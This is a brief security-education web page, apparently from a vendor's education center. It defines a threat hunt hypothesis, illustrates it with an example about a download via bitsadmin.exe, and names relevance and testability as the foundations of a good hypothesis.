What is a Threat Hunt Hypothesis?

A threat hunt hypothesis is a supposition or proposed explanation made on the basis of limited evidence from a security environment, and this proposed explanation is then used as a starting point for further investigation. A threat hunt hypothesis, much like a scientific hypothesis, is a statement of an idea or explanation to test against data, as seen in the following example:

Hypothesis: A threat actor can use bitasdmin.exe to download a file to an endpoint on the organization’s network.

The hunt hypothesis can be generated from a number of sources. These include but are not limited to new zero-day vulnerabilities, threat actor research, threat intelligence, security control gaps, incident reports, and many more sources. Regardless of the source, the foundations of a good hypothesis are Relevance and Testability:

Relevance – How does the hypothesis relate to organizational needs, current industry trends, and available data sources?

Testability – The data and tools available that may provide some chance of finding what is being sought within the hypothesis.

Looking for more information on Threat Hunting? Take a deep dive into Threat Hunting and a TTP-based hunt example with deepwatcher Adam Schmitz in his blog article: Threat Hunting in Splunk.

Back to Education Center

Subscribe to the Deepwatch Insights Blog